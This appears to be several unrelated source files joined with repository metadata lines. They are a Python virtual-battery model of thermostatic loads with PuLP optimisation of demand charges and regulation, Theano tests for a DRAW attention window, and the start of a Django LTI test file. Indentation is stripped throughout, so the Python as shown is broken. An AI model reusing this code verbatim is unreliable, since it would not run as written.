P0 = (self.theta_a - self.theta_s)/self.R/self.eta # average baseline power consumption for the given temperature setpoint
return super(AC, self).generate(participation, P0)
class HP(VirtualBattery):
""" Derived Class for specifically HP Virtual Battery. """
def __init__(self, theta_a, capacitance, resistance, rated_power, COP, deadband, setpoint, tcl_number):
super(HP, self).__init__(theta_a, capacitance, resistance, rated_power, COP, deadband, setpoint, tcl_number)
# self.tcl_idx = tcl_idx
self.theta_a = self.ambient # theta_a == ambient temperature
def generate(self):
#heuristic function of participation
atan = np.arctan
# participation for HP
Ta = np.linspace(0, 25, num=51)
participation = 1-(atan(self.theta_a-10) - atan(Ta[0]-10))/((atan(Ta[-1]-10) - atan(Ta[0]-10)))
participation = np.clip(participation, 0, 1)
#P0 for HP
P0 = (self.theta_s - self.theta_a)/self.R/self.eta
return super(HP, self).generate(participation, P0)
class RG(VirtualBattery):
""" Derived Class for specifically RG Virtual Battery. """
def __init__(self, theta_a, capacitance, resistance, rated_power, COP, deadband, setpoint, tcl_number):
super(RG, self).__init__(theta_a, capacitance, resistance, rated_power, COP, deadband, setpoint, tcl_number)
# self.tcl_idx = tcl_idx
self.theta_a = self.ambient # theta_a == ambient temperature
def generate(self):
#heuristic function of participation
atan = np.arctan
# participation for RG
participation = np.ones(self.theta_a.shape)
participation = np.clip(participation, 0, 1)
#P0 for RG
P0 = (self.theta_a - self.theta_s)/self.R/self.eta # average baseline power consumption for the given temperature setpoint
return super(RG, self).generate(participation, P0)
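# Illustrative usage (a sketch added for clarity; the parameter values below are
# assumptions chosen for demonstration, not defaults from this module):
#
#   amb = np.full(8760, 30.0)   # hourly ambient temperature (degC)
#   ac = AC(amb, capacitance=2.0, resistance=2.0, rated_power=5.6,
#           COP=2.5, deadband=0.3, setpoint=22.5, tcl_number=1000)
#   p_lower, p_upper, e_ul = ac.generate()
#   # p_lower/p_upper: aggregate power flexibility bounds (kW) per hour;
#   # e_ul: bound on stored-energy deviation (kWh) around the setpoint.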
class WH(VirtualBattery):
""" Derived class for specifically Water Heater Virtual Battery. """
N_wh = 50
def __init__(self, theta_a, capacitance, resistance, rated_power, COP, deadband, setpoint, tcl_number,Tout, water):
super(WH, self).__init__(theta_a, capacitance, resistance, rated_power, COP, deadband, setpoint, tcl_number)
self.C_wh = self.C*np.ones((self.N_wh, 1)) # thermal capacitance, set in parent class
self.R_wh = self.R*np.ones((self.N_wh, 1)) # thermal resistance
self.P_wh = self.P*np.ones((self.N_wh, 1)) # rated power (kW) of each TCL
self.delta_wh = self.delta*np.ones((self.N_wh, 1)) # temperature deadband
self.theta_s_wh = self.theta_s*np.ones((self.N_wh, 1)) # temperature setpoint
self.Tout=Tout
self.water = water
# self.N = self.para[6] # number of TCL
def calculate_twat(self,tout_avg,tout_madif):
tout_avg=tout_avg/5*9+32
tout_madif=tout_madif/5*9
ratio = 0.4 + 0.01 * (tout_avg - 44)
lag = 35 - 1.0 * (tout_avg - 44)
twat = 1*np.ones((365*24*60,1))
for i in range(365):
for j in range(60*24):
twat[i*24*60+j]= (tout_avg+6)+ratio*(tout_madif/ 2) * sin((0.986 * (i - 15 - lag) - 90)/180*3.14)
twat=(twat-32.)/9.*5.
return twat
def prepare_pare_for_calculate_twat(self,tou_raw):
tout_avg = sum(tou_raw)/len(tou_raw)
mon=[31,28,31,30,31,30,31,31,30,31,30,31]
mon_ave=1*np.ones((12,1))
        mon_ave[0]=sum(tou_raw[0:mon[0]*24])/mon[0]/24
        stop=mon[0]*24
        for idx in range(1,len(mon)):
            mon_ave[idx]=sum(tou_raw[stop:stop+mon[idx]*24])/mon[idx]/24
            stop=stop+mon[idx]*24  # advance the window so each month averages its own hours
tou_madif=max(mon_ave)- min(mon_ave)
return tout_avg, tou_madif
def generate(self):
# theta_a is the ambient temperature
# theta_a = (72-32)*5.0/9*np.ones((365, 24*60)) # This is a hard-coded 72degF, converted to degCel
theta_a = self.ambient#*np.ones((365, 24*60)) # theta_a == ambient temperature
#nRow, nCol = theta_a.shape
nRow, nCol = 365, 24*60
theta_a = np.reshape(theta_a, [nRow*nCol, 1])
Tout1min= np.zeros((size(theta_a)));
for i in range(len(self.Tout)):
theta_a[i]= (self.Tout[i]+self.ambient[i])/2; # CHANGED THIS
# h is the model time discretization step in seconds
h = 60
#T is the number of time step considered, i.e., T = 365*24*60 means a year
# with 1 minute time discretization
T = len(theta_a)
tou_avg,maxdiff=self.prepare_pare_for_calculate_twat(self.Tout)
twat=self.calculate_twat(tou_avg,maxdiff);
# print twat
# theta_lower is the temperature lower bound
theta_lower_wh = self.theta_s_wh - self.delta_wh/2.0
# theta_upper is the temperature upper bound
theta_upper_wh = self.theta_s_wh + self.delta_wh/2.0
# m_water is the water draw in unit of gallon per minute
m_water = self.water#np.genfromtxt("Flow_raw_1minute_BPA.csv", delimiter=',')[1:, 1:]
where_are_NaNs = isnan(m_water)
m_water[where_are_NaNs] = 0
m_water = m_water *0.00378541178*1000/h
m_water_row, m_water_col = m_water.shape
water_draw = np.zeros((m_water_row, int(self.N_wh)))
for i in range(int(self.N_wh)):
k = np.random.randint(m_water_col)
water_draw[:, i] = np.roll(m_water[:, k], (1, np.random.randint(-14, 1))) + m_water[:, k] * 0.1 * (np.random.random() - 0.5)
# k = m_water_col - 1
# print(k)
# raise(ArgumentError, "Stop here")
# water_draw[:, i] = m_water[:, k]
first = -(
np.matmul(theta_a, np.ones((1, self.N_wh)))
- np.matmul(np.ones((T, 1)), self.theta_s_wh.transpose())
)
# print(np.argwhere(np.isnan(first)))
second = np.matmul(np.ones((T, 1)), self.R_wh.transpose())
# print(np.argwhere(np.isnan(second)))
Po = (
first
/ second
- 4.2
* np.multiply(water_draw, (55-32) * 5/9.0 - np.matmul(np.ones((T, 1)), self.theta_s_wh.transpose()))
)
# print(water_draw.shape)
# print(len(water_draw[:1]))
# Po_total is the analytically predicted aggregate baseline power
Po_total = np.sum(Po, axis=1)
upper_limit = np.sum(self.P_wh, axis=0)
# print(np.argwhere(np.isnan(water_draw)))
Po_total[Po_total > upper_limit[0]] = upper_limit
# theta is the temperature of TCLs
theta = np.zeros((self.N_wh, T))
theta[:, 0] = self.theta_s_wh.reshape(-1)
# m is the indicator of on-off state: 1 is on, 0 is off
m = np.ones((self.N_wh, T))
m[:int(self.N_wh*0.8), 0] = 0
for t in range(T - 1):
theta[:, t+1] = (
(1 - h/(self.C_wh * 3600) / self.R_wh).reshape(-1)
* theta[:, t]
+ (h / (self.C_wh * 3600) / self.R_wh).reshape(-1)
* theta_a[t]
+ ((h/(self.C_wh * 3600))*self.P_wh).reshape(-1)*m[:, t]
)
m[theta[:, t+1] > (theta_upper_wh).reshape(-1), t+1] = 0
m[theta[:, t+1] < (theta_lower_wh).reshape(-1), t+1] = 1
m[(theta[:, t+1] >= (theta_lower_wh).reshape(-1)) & (theta[:, t+1] <= (theta_upper_wh).reshape(-1)), t+1] = m[(theta[:, t+1] >= (theta_lower_wh).reshape(-1)) & (theta[:, t+1] <= (theta_upper_wh).reshape(-1)), t]
theta[:, 0] = theta[:, -1]
m[:, 0] = m[:, -1]
# Po_total_sim is the predicted aggregate baseline power using simulations
Po_total_sim = np.zeros((T, 1))
Po_total_sim[0] = np.sum(m[:, 0]*(self.P_wh.reshape(-1)))
for t in range(T - 1):
# print t
theta[:, t+1] = (1 - h/(self.C_wh * 3600)/self.R_wh).reshape(-1) * theta[:, t] + (h/(self.C_wh * 3600)/self.R_wh).reshape(-1)*theta_a[t] + (h/(self.C_wh*3600)).reshape(-1)*m[:, t]*self.P_wh.reshape(-1) + h*4.2*water_draw[t, :].transpose() * (twat[t] -theta[:, t]) / ((self.C_wh*3600).reshape(-1))
m[theta[:, t+1] > (theta_upper_wh).reshape(-1), t+1] = 0
m[theta[:, t+1] < (theta_lower_wh).reshape(-1), t+1] = 1
m[(theta[:, t+1] >= (theta_lower_wh).reshape(-1)) & (theta[:, t+1] <= (theta_upper_wh).reshape(-1)), t+1] = m[(theta[:, t+1] >= (theta_lower_wh).reshape(-1)) & (theta[:, t+1] <= (theta_upper_wh).reshape(-1)), t]
Po_total_sim[t+1] = np.sum(m[:, t+1] * self.P_wh.reshape(-1))
index_available = np.ones((self.N_wh, T))
for t in range(T - 1):
index_available[(theta[:, t] < (theta_lower_wh-0.5).reshape(-1)) | (theta[:, t] > (theta_upper_wh+0.5).reshape(-1)), t] = 0
# Virtual battery parameters
p_upper_wh1 = np.sum(self.P_wh) - Po_total_sim
p_lower_wh1 = Po_total_sim
e_ul_wh1 = np.sum((np.matmul(self.C_wh, np.ones((1, T))) * np.matmul(self.delta_wh, np.ones((1, T))) / 2 * index_available).transpose(), axis=1)
# calculate hourly average data from minute output for power
p_upper_wh1 = np.reshape(p_upper_wh1, [8760,60])
p_upper_wh = np.mean(p_upper_wh1, axis=1)*float(self.N)/float(self.N_wh)
p_lower_wh1 = np.reshape(p_lower_wh1, [8760,60])
p_lower_wh = np.mean(p_lower_wh1, axis=1)*float(self.N)/float(self.N_wh)
# extract hourly data from minute output for energy
e_ul_wh = e_ul_wh1[59:len(e_ul_wh1):60]*float(self.N)/float(self.N_wh)
return p_lower_wh, p_upper_wh, e_ul_wh
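# Illustrative glue code (a sketch; the column names follow the strings consumed
# by run_fhec()/run_okec() below, while the sign convention and the load/price
# series are assumptions):
#
#   p_lo, p_up, e_ul = WH(amb, C, R, P, COP, db, sp, n, Tout, water).generate()
#   Input = pd.DataFrame({
#       'Hour': range(1, 8761),
#       'Load (kW)': load_kw,                       # assumed hourly series
#       'VB Power lower (kW)': -p_lo,               # discharge limit
#       'VB Power upper (kW)': p_up,                # charge limit
#       'VB Energy lower (kWh)': -e_ul,
#       'VB Energy upper (kWh)': e_ul,
#       'Reg-up Price ($/MW)': reg_up_price,        # assumed hourly series
#       'Reg-dn Price ($/MW)': reg_dn_price,        # assumed hourly series
#   }).set_index('Hour')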
# ------------------------STACKED CODE FROM PNNL----------------------------- #
def run_fhec(ind, gt_demand, Input):
use_hour = int(ind["userHourLimit"]) # number of VB use hours specified by the user
epsilon = 1 #float(ind["energyReserve"]) # energy reserve parameter, range: 0 - 1
fhec_kwh_rate = float(ind["electricityCost"]) # $/kW
fhec_peak_mult = float(ind["peakMultiplier"])
s = sorted(gt_demand)
# peak hours calculation
perc = float(ind["peakPercentile"])
fhec_gt98 = s[int(perc*len(s))]
fhec_peak_hours = []
for idx, val in enumerate(gt_demand):
if val > fhec_gt98:
fhec_peak_hours.extend([idx+1])
fhec_off_peak_hours = []
for i in range(len(gt_demand)):
if i not in fhec_peak_hours:
fhec_off_peak_hours.extend([i+1])
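    # e.g. with peakPercentile = 0.98 over 8760 hourly values, fhec_gt98 is the
    # ~98th-percentile demand, so roughly the top 2% of hours (~175) are billed
    # at fhec_peak_mult times the base kWh rate (illustrative; the exact count
    # depends on ties in the data).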
# read the input data, including load profile, VB profile, and regulation price
# Input = pd.read_csv(input_csv, index_col=['Hour'])
# VB model parameters
C = float(ind["capacitance"]) # thermal capacitance
R = float(ind["resistance"]) # thermal resistance
deltaT = 1
alpha = math.exp(-deltaT/(C*R)) # hourly self discharge rate
E_0 = 0 # VB initial energy state
arbitrage_option = ind["use_arbitrage"] == "on"
regulation_option = ind["use_regulation"] == "on"
deferral_option = ind["use_deferral"] == "on"
# calculate the predicted profits for all 8760 hours
use_prft = []
for hour in Input.index:
temp = 0
if arbitrage_option or deferral_option:
if hour in fhec_peak_hours:
temp += fhec_peak_mult*fhec_kwh_rate*(Input.loc[hour, "VB Energy upper (kWh)"]-Input.loc[hour, "VB Energy lower (kWh)"])
if hour in fhec_off_peak_hours:
temp += fhec_kwh_rate*(Input.loc[hour, "VB Energy upper (kWh)"]-Input.loc[hour, "VB Energy lower (kWh)"])
if regulation_option:
temp += (Input.loc[hour, "Reg-up Price ($/MW)"]+Input.loc[hour, "Reg-dn Price ($/MW)"])/1000*(Input.loc[hour, "VB Energy upper (kWh)"]-Input.loc[hour, "VB Energy lower (kWh)"])
use_prft.append({'Hour': hour, 'Profit': temp})
# sort the predicted profits from the highest to the lowest
use_prft = sorted(use_prft, reverse = True, key = lambda i : i['Profit'])
# get the indices of the first use_hour hours, and the optimization will be scheduled only for those hours
use_list = []
for index in range(use_hour):
use_list.append(use_prft[index]['Hour'])
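    # i.e. the VB may only act during the `use_hour` highest-value hours; in
    # every other hour its power and regulation bids are clamped to zero below.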
###############################################################################
# start demand charge reduction LP problem
model = pulp.LpProblem("Demand charge minimization problem FHEC-Knievel", pulp.LpMinimize)
# decision variable of VB charging power; dim: 8760 by 1
VBpower = pulp.LpVariable.dicts("ChargingPower", ((hour) for hour in Input.index))
# set bound
for hour in Input.index:
if hour in use_list:
VBpower[hour].lowBound = Input.loc[hour, "VB Power lower (kW)"]
VBpower[hour].upBound = Input.loc[hour, "VB Power upper (kW)"]
if hour not in use_list:
VBpower[hour].lowBound = 0
VBpower[hour].upBound = 0
# decision variable of VB energy state; dim: 8760 by 1
VBenergy = pulp.LpVariable.dicts("EnergyState", ((hour) for hour in Input.index))
# set bound
for hour in Input.index:
VBenergy[hour].lowBound = Input.loc[hour, "VB Energy lower (kWh)"]
VBenergy[hour].upBound = Input.loc[hour, "VB Energy upper (kWh)"]
# decision variable of annual peak demand
PeakDemand = pulp.LpVariable("annual peak demand", lowBound=0)
# decision variable: hourly regulation up capacity; dim: 8760 by 1
reg_up = pulp.LpVariable.dicts("hour reg up", ((hour) for hour in Input.index), lowBound=0)
# decision variable: hourly regulation dn capacity; dim: 8760 by 1
reg_dn = pulp.LpVariable.dicts("hour reg dn", ((hour) for hour in Input.index), lowBound=0)
for hour in Input.index:
if hour not in use_list:
reg_up[hour].upBound = 0
reg_dn[hour].upBound = 0
# objective functions
if (arbitrage_option == False and regulation_option == False and deferral_option == False):
model += 0, "an arbitrary objective function"
if (arbitrage_option == True and regulation_option == False and deferral_option == False):
model += pulp.lpSum([fhec_peak_mult*fhec_kwh_rate*(Input.loc[hour, "Load (kW)"]+VBpower[hour]) for hour in fhec_peak_hours]
+ [fhec_kwh_rate*(Input.loc[hour, "Load (kW)"]+VBpower[hour]) for hour in fhec_off_peak_hours])
if (arbitrage_option == False and regulation_option == True and deferral_option == False):
model += pulp.lpSum([-Input.loc[hour, "Reg-up Price ($/MW)"]/1000*reg_up[hour] for hour in Input.index]
+ [-Input.loc[hour, "Reg-dn Price ($/MW)"]/1000*reg_dn[hour] for hour in Input.index])
if (arbitrage_option == False and regulation_option == False and deferral_option == True):
model += pulp.lpSum(1E03*PeakDemand)
if (arbitrage_option == True and regulation_option == True and deferral_option == False):
model += pulp.lpSum([fhec_peak_mult*fhec_kwh_rate*(Input.loc[hour, "Load (kW)"]+VBpower[hour]) for hour in fhec_peak_hours]
+ [fhec_kwh_rate*(Input.loc[hour, "Load (kW)"]+VBpower[hour]) for hour in fhec_off_peak_hours]
+ [-Input.loc[hour, "Reg-up Price ($/MW)"]/1000*reg_up[hour] for hour in Input.index]
+ [-Input.loc[hour, "Reg-dn Price ($/MW)"]/1000*reg_dn[hour] for hour in Input.index])
if (arbitrage_option == True and regulation_option == False and deferral_option == True):
model += pulp.lpSum([fhec_peak_mult*fhec_kwh_rate*(Input.loc[hour, "Load (kW)"]+VBpower[hour]) for hour in fhec_peak_hours]
+ [fhec_kwh_rate*(Input.loc[hour, "Load (kW)"]+VBpower[hour]) for hour in fhec_off_peak_hours]
+ 1E03*PeakDemand)
if (arbitrage_option == False and regulation_option == True and deferral_option == True):
model += pulp.lpSum([-Input.loc[hour, "Reg-up Price ($/MW)"]/1000*reg_up[hour] for hour in Input.index]
+ [-Input.loc[hour, "Reg-dn Price ($/MW)"]/1000*reg_dn[hour] for hour in Input.index]
+ 1E03*PeakDemand)
if (arbitrage_option == True and regulation_option == True and deferral_option == True):
model += pulp.lpSum([fhec_peak_mult*fhec_kwh_rate*(Input.loc[hour, "Load (kW)"]+VBpower[hour]) for hour in fhec_peak_hours]
+ [fhec_kwh_rate*(Input.loc[hour, "Load (kW)"]+VBpower[hour]) for hour in fhec_off_peak_hours]
+ [-Input.loc[hour, "Reg-up Price ($/MW)"]/1000*reg_up[hour] for hour in Input.index]
+ [-Input.loc[hour, "Reg-dn Price ($/MW)"]/1000*reg_dn[hour] for hour in Input.index]
+ 1E03*PeakDemand)
# VB energy state as a function of VB power
for hour in Input.index:
if hour==1:
model += VBenergy[hour] == alpha*E_0 + VBpower[hour]*deltaT
else:
model += VBenergy[hour] == alpha*VBenergy[hour-1] + VBpower[hour]*deltaT
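            # a leaky-integrator discretization: stored energy self-discharges
            # by alpha = exp(-deltaT/(R*C)) each hour, plus the energy moved by
            # the charging power over the step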
# hourly regulation constraints
for hour in Input.index:
if regulation_option:
model += reg_up[hour] == reg_dn[hour] # regulation balance
model += VBenergy[hour] - epsilon*reg_up[hour]*deltaT >= VBenergy[hour].lowBound
model += VBenergy[hour] + epsilon*reg_dn[hour]*deltaT <= VBenergy[hour].upBound
else:
model += reg_up[hour] == 0
model += reg_dn[hour] == 0
# extra constraints
for hour in Input.index:
model += PeakDemand >= Input.loc[hour, "Load (kW)"] + VBpower[hour]
model.solve()
###############################################################################
use_hour_indicator = []
for hour in Input.index:
if VBpower[hour].varValue != 0 or reg_up[hour].varValue != 0:
use_hour_indicator.append({'Hour': hour, 'Use': 1})
else:
use_hour_indicator.append({'Hour': hour, 'Use': 0})
output = []
for hour in Input.index:
var_output = {
'Hour': hour,
'VB energy (kWh)': int(100*VBenergy[hour].varValue)/100,
'VB power (kW)': int(100*VBpower[hour].varValue)/100,
'Load (kW)': int(100*Input.loc[hour, "Load (kW)"])/100,
'Net load (kW)': int(100*(VBpower[hour].varValue+Input.loc[hour, "Load (kW)"]))/100,
'Hour used': use_hour_indicator[hour-1]['Use']
}
if regulation_option:
var_regulation = {'Regulation (kW)': int(100*reg_up[hour].varValue)/100}
var_output.update(var_regulation)
output.append(var_output)
output_df = pd.DataFrame.from_records(output)
# output_df.to_csv('fhec_output.csv', index=False)
return output_df
def run_okec(ind, Input):
# Input.to_csv('okec_input.csv', index=False)
use_hour = int(ind["userHourLimit"]) # number of VB use hours specified by the user
epsilon = 1 #float(ind["energyReserve"]) # energy reserve parameter, range: 0 - 1
okec_peak_charge = float(ind["annual_peak_charge"]) # annual peak demand charge $100/kW
okec_avg_demand_charge = float(ind["avg_demand_charge"]) # $120/kW
okec_fuel_charge = float(ind["fuel_charge"]) # total energy $/kWh
# VB model parameters
C = float(ind["capacitance"]) # thermal capacitance
R = float(ind["resistance"]) # thermal resistance
deltaT = 1
alpha = math.exp(-deltaT/(C*R)) # hourly self discharge rate
E_0 = 0 # VB initial energy state
arbitrage_option = ind["use_arbitrage"] == "on"
regulation_option = ind["use_regulation"] == "on"
deferral_option = ind["use_deferral"] == "on"
# calculate the predicted profits for all 8760 hours
use_prft = []
for hour in Input.index:
temp = 0
if arbitrage_option or deferral_option:
temp += okec_avg_demand_charge/len(Input.index)*(Input.loc[hour, "VB Energy upper (kWh)"]-Input.loc[hour, "VB Energy lower (kWh)"])
if regulation_option:
temp += (Input.loc[hour, "Reg-up Price ($/MW)"]+Input.loc[hour, "Reg-dn Price ($/MW)"])/1000*(Input.loc[hour, "VB Energy upper (kWh)"]-Input.loc[hour, "VB Energy lower (kWh)"])
use_prft.append({'Hour': hour, 'Profit': temp})
# sort the predicted profits from the highest to the lowest
use_prft = sorted(use_prft, reverse = True, key = lambda i : i['Profit'])
# get the indices of the first use_hour hours, and the optimization will be scheduled only for those hours
use_list = []
for index in range(use_hour):
use_list.append(use_prft[index]['Hour'])
# start demand charge reduction LP problem
model = pulp.LpProblem("Demand charge minimization problem OKEC-Buffett", pulp.LpMinimize)
# decision variable of VB charging power; dim: 8760 by 1
VBpower = pulp.LpVariable.dicts("ChargingPower", ((hour) for hour in Input.index))
# set bound
for hour in Input.index:
if hour in use_list:
VBpower[hour].lowBound = Input.loc[hour, "VB Power lower (kW)"]
VBpower[hour].upBound = Input.loc[hour, "VB Power upper (kW)"]
if hour not in use_list:
VBpower[hour].lowBound = 0
VBpower[hour].upBound = 0
# decision variable of VB energy state; dim: 8760 by 1
VBenergy = pulp.LpVariable.dicts("EnergyState", ((hour) for hour in Input.index))
# set bound
for hour in Input.index:
VBenergy[hour].lowBound = Input.loc[hour, "VB Energy lower (kWh)"]
VBenergy[hour].upBound = Input.loc[hour, "VB Energy upper (kWh)"]
# decision variable of annual peak demand
PeakDemand = pulp.LpVariable("annual peak demand", lowBound=0)
# decision variable: hourly regulation up capacity; dim: 8760 by 1
reg_up = pulp.LpVariable.dicts("hour reg up", ((hour) for hour in Input.index), lowBound=0)
# decision variable: hourly regulation dn capacity; dim: 8760 by 1
reg_dn = pulp.LpVariable.dicts("hour reg dn", ((hour) for hour in Input.index), lowBound=0)
for hour in Input.index:
if hour not in use_list:
reg_up[hour].upBound = 0
reg_dn[hour].upBound = 0
# objective function: sum of monthly demand charge
if (arbitrage_option == False and regulation_option == False and deferral_option == False):
model += 0, "an arbitrary objective function"
if (arbitrage_option == True and regulation_option == False and deferral_option == False):
model += pulp.lpSum(okec_peak_charge*PeakDemand
+ [okec_avg_demand_charge*(Input.loc[hour, "Load (kW)"]+VBpower[hour])/len(Input.index) for hour in Input.index]
+ [okec_fuel_charge*(Input.loc[hour, "Load (kW)"]+VBpower[hour])*deltaT for hour in Input.index])
if (arbitrage_option == False and regulation_option == True and deferral_option == False):
model += pulp.lpSum([-Input.loc[hour, "Reg-up Price ($/MW)"]/1000*reg_up[hour] for hour in Input.index]
+ [-Input.loc[hour, "Reg-dn Price ($/MW)"]/1000*reg_dn[hour] for hour in Input.index])
if (arbitrage_option == False and regulation_option == False and deferral_option == True):
model += pulp.lpSum(1E03*PeakDemand)
if (arbitrage_option == True and regulation_option == True and deferral_option == False):
model += pulp.lpSum(okec_peak_charge*PeakDemand
+ [okec_avg_demand_charge*(Input.loc[hour, "Load (kW)"]+VBpower[hour])/len(Input.index) for hour in Input.index]
+ [okec_fuel_charge*(Input.loc[hour, "Load (kW)"]+VBpower[hour])*deltaT for hour in Input.index]
+ [-Input.loc[hour, "Reg-up Price ($/MW)"]/1000*reg_up[hour] for hour in Input.index]
+ [-Input.loc[hour, "Reg-dn Price ($/MW)"]/1000*reg_dn[hour] for hour in Input.index])
if (arbitrage_option == True and regulation_option == False and deferral_option == True):
model += pulp.lpSum(okec_peak_charge*PeakDemand
+ [okec_avg_demand_charge*(Input.loc[hour, "Load (kW)"]+VBpower[hour])/len(Input.index) for hour in Input.index]
+ [okec_fuel_charge*(Input.loc[hour, "Load (kW)"]+VBpower[hour])*deltaT for hour in Input.index]
+ 1E03*PeakDemand)
if (arbitrage_option == False and regulation_option == True and deferral_option == True):
model += pulp.lpSum([-Input.loc[hour, "Reg-up Price ($/MW)"]/1000*reg_up[hour] for hour in Input.index]
+ [-Input.loc[hour, "Reg-dn Price ($/MW)"]/1000*reg_dn[hour] for hour in Input.index]
+ 1E03*PeakDemand)
if (arbitrage_option == True and regulation_option == True and deferral_option == True):
model += pulp.lpSum(okec_peak_charge*PeakDemand
+ [okec_avg_demand_charge*(Input.loc[hour, "Load (kW)"]+VBpower[hour])/len(Input.index) for hour in Input.index]
+ [okec_fuel_charge*(Input.loc[hour, "Load (kW)"]+VBpower[hour])*deltaT for hour in Input.index]
+ [-Input.loc[hour, "Reg-up Price ($/MW)"]/1000*reg_up[hour] for hour in Input.index]
+ [-Input.loc[hour, "Reg-dn Price ($/MW)"]/1000*reg_dn[hour] for hour in Input.index]
+ 1E03*PeakDemand)
# VB energy state as a function of VB power
for hour in Input.index:
if hour==1:
model += VBenergy[hour] == alpha*E_0 + VBpower[hour]*deltaT
else:
model += VBenergy[hour] == alpha*VBenergy[hour-1] + VBpower[hour]*deltaT
# hourly regulation constraints
for hour in Input.index:
if regulation_option:
model += reg_up[hour] == reg_dn[hour] # regulation balance
model += VBenergy[hour] - epsilon*reg_up[hour]*deltaT >= VBenergy[hour].lowBound
model += VBenergy[hour] + epsilon*reg_dn[hour]*deltaT <= VBenergy[hour].upBound
else:
model += reg_up[hour] == 0
model += reg_dn[hour] == 0
# extra constraints
for hour in Input.index:
model += PeakDemand >= Input.loc[hour, "Load (kW)"] + VBpower[hour]
model.solve()
###############################################################################
use_hour_indicator = []
for hour in Input.index:
if VBpower[hour].varValue != 0 or reg_up[hour].varValue != 0:
use_hour_indicator.append({'Hour': hour, 'Use': 1})
else:
use_hour_indicator.append({'Hour': hour, 'Use': 0})
output = []
for hour in Input.index:
var_output = {
'Hour': hour,
'VB energy (kWh)': int(100*VBenergy[hour].varValue)/100,
'VB power (kW)': int(100*VBpower[hour].varValue)/100,
'Load (kW)': int(100*Input.loc[hour, "Load (kW)"])/100,
'Net load (kW)': int(100*(VBpower[hour].varValue+Input.loc[hour, "Load (kW)"]))/100,
'Hour used': use_hour_indicator[hour-1]['Use']
}
if regulation_option:
var_regulation = {'Regulation (kW)': int(100*reg_up[hour].varValue)/100}
var_output.update(var_regulation)
output.append(var_output)
output_df = pd.DataFrame.from_records(output)
return output_df
| gpl-2.0 |
ablavatski/draw | tests/test_attention.py | 7 | 4359 |
import unittest
import theano
import numpy as np
from theano import tensor as T
from draw.attention import *
floatX = theano.config.floatX
def test_batched_dot():
a = T.ftensor3('a')
b = T.ftensor3('b')
c = my_batched_dot(a, b)
    # Test it with concrete values
dim1, dim2, dim3, dim4 = 10, 12, 15, 20
A_shape = (dim1, dim2, dim3)
B_shape = (dim1, dim3, dim4)
C_shape = (dim1, dim2, dim4)
A = np.arange(np.prod(A_shape)).reshape(A_shape).astype(floatX)
B = np.arange(np.prod(B_shape)).reshape(B_shape).astype(floatX)
C = c.eval({a: A, b: B})
# check shape
assert C.shape == C_shape
# check content
C_ = np.zeros((dim1, dim2, dim4))
for i in range(dim1):
C_[i] = np.dot(A[i], B[i])
assert np.allclose(C, C_)
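# Reference semantics (editorial note, mirroring the check above):
# my_batched_dot(a, b)[i] == T.dot(a[i], b[i]) for every batch index i -- the
# contraction numpy spells as np.matmul(A, B) for 3-D operands.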
class TestZoomableAttentionWindow:
def setUp(self):
# Device under test
self.channels = 1
self.height = 50
self.width = 120
self.N = 100
self.zaw = ZoomableAttentionWindow(self.channels, self.height, self.width, self.N)
def test_filterbank_matrices(self):
batch_size = 100
height, width = self.height, self.width
N = self.N
zaw = self.zaw
# Create theano function
center_y, center_x = T.fvectors('center_x', 'center_y')
delta, sigma = T.fvectors('delta', 'sigma')
FY, FX = zaw.filterbank_matrices(center_y, center_x, delta, sigma)
do_filterbank = theano.function(
[center_y, center_x, delta, sigma],
[FY, FX],
name="do_filterbank_matrices",
allow_input_downcast=True)
# test theano function
center_y = np.linspace(-height, 2*height, batch_size)
center_x = np.linspace(-width, 2*width, batch_size)
delta = np.linspace(0.1, height, batch_size)
sigma = np.linspace(0.1, height, batch_size)
FY, FX = do_filterbank(center_y, center_x, delta, sigma)
assert FY.shape == (batch_size, N, height)
assert FX.shape == (batch_size, N, width)
assert np.isfinite(FY).all()
assert np.isfinite(FX).all()
def test_read(self):
batch_size = 100
height, width = self.height, self.width
N = self.N
zaw = self.zaw
# Create theano function
images = T.ftensor3('images')
center_y, center_x = T.fvectors('center_x', 'center_y')
delta, sigma = T.fvectors('delta', 'sigma')
readout = zaw.read(images, center_y, center_x, delta, sigma)
do_read = theano.function(
[images, center_y, center_x, delta, sigma],
readout,
name="do_read",
allow_input_downcast=True)
# Test theano function
images = np.random.uniform(size=(batch_size, height, width))
center_y = np.linspace(-height, 2*height, batch_size)
center_x = np.linspace(-width, 2*width, batch_size)
delta = np.linspace(0.1, height, batch_size)
sigma = np.linspace(0.1, height, batch_size)
readout = do_read(images, center_y, center_x, delta, sigma)
assert readout.shape == (batch_size, N**2)
assert np.isfinite(readout).all()
assert (readout >= 0.).all()
assert (readout <= 1.).all()
def test_write(self):
batch_size = 100
height, width = self.height, self.width
N = self.N
zaw = self.zaw
# Create theano function
content = T.fmatrix('content')
        center_y, center_x = T.fvectors('center_y', 'center_x')
delta, sigma = T.fvectors('delta', 'sigma')
images = zaw.write(content, center_y, center_x, delta, sigma)
do_write = theano.function(
[content, center_y, center_x, delta, sigma],
images,
name="do_write",
allow_input_downcast=True)
# Test theano function
content = np.random.uniform(size=(batch_size, N**2))
center_y = np.linspace(-height, 2*height, batch_size)
center_x = np.linspace(-width, 2*width, batch_size)
delta = np.linspace(0.1, height, batch_size)
sigma = np.linspace(0.1, height, batch_size)
images = do_write(content, center_y, center_x, delta, sigma)
assert images.shape == (batch_size, height*width)
assert np.isfinite(images).all()
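# --- Illustrative sketch (not part of the original tests) ---
# One common DRAW-style formulation of the filterbank matrices exercised
# above (an assumption about ZoomableAttentionWindow's internals, shown only
# to make the expected (N, image_dim) shape and row normalization concrete).
def _reference_filterbank(center, delta, sigma, N, img_dim):
    """Row-normalized Gaussian filterbank of shape (N, img_dim)."""
    mu = center + (np.arange(N) - N / 2.0 - 0.5) * delta       # filter centers
    a = np.arange(img_dim)                                     # pixel coordinates
    F = np.exp(-(a[None, :] - mu[:, None]) ** 2 / (2.0 * sigma ** 2))
    return F / np.maximum(F.sum(axis=1, keepdims=True), 1e-8)  # rows sum to ~1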
| mit |
raccoongang/socraticqs2 | mysite/lti/tests.py | 1 | 21256 | # coding=utf-8
import json
import oauth2
from datetime import date, timedelta
import unittest
from mock import patch, Mock
from ddt import ddt, data, unpack
from django.utils import timezone
from django.test import TestCase, Client
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from accounts.models import Profile, Instructor
from psa.models import UserSocialAuth
from ct.models import Course, Role, Unit, CourseUnit, UnitLesson, Lesson
from lti.models import LTIUser, CourseRef, LtiConsumer
from lti.views import create_courseref
class LTITestCase(TestCase):
def setUp(self):
"""
Preconditions.
"""
